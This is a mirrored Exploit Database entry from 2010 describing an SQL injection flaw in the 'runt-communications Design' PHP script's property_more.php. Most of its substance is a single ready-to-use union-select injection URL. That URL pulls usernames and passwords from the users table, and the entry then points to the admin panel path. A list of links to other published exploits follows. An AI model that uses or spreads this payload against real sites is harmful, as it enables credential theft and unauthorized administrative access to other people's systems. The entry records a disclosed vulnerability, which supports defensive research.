runt-communications Design – ‘property_more.php’ SQL Injection

Exploit Database
13 阅读

作者： CoBRa_21

日期： 2010-05-24
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/12716/

-------------------------------------------------------------------------------------------

runt-communications Design (property_more.php) SQL Injection Vulnerability

-------------------------------------------------------------------------------------------

Author: CoBRa_21

Mail: uyku_cu@windowslive.com

Script Home: http://runtcommunications.com

-------------------------------------------------------------------------------------------

Sql Injection:

http://localhost/[path]/property_more.php?id=-9999 union select 0,version(),2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11 from users

Admin Panel

http://localhost/[path]/admin
-------------------------------------------------------------------------------------------

last Exploits
runt-communications Design – ‘property_more.php’ SQL Injection的更多信息

Joomla! Component com_xball – ‘team_id’ SQL Injection：
SmoothWall Express 3.0 – Multiple Vulnerabilities：
SOA School Management – ‘view’ SQL Injection：
IBM Tivoli Access Manager for E-Business – ‘/ibm/wpm/gsogroup?method’ Cross-Site Scripting：
WordPress Plugin jRSS Widget 1.1.1 – ‘url’ Information Disclosure：
ES Job Search Engine 3.0 – SQL Injection：
Jetty 9.4.37.v20210219 – Information Disclosure：
Uiga Church Portal – ‘index.php’ SQL Injection：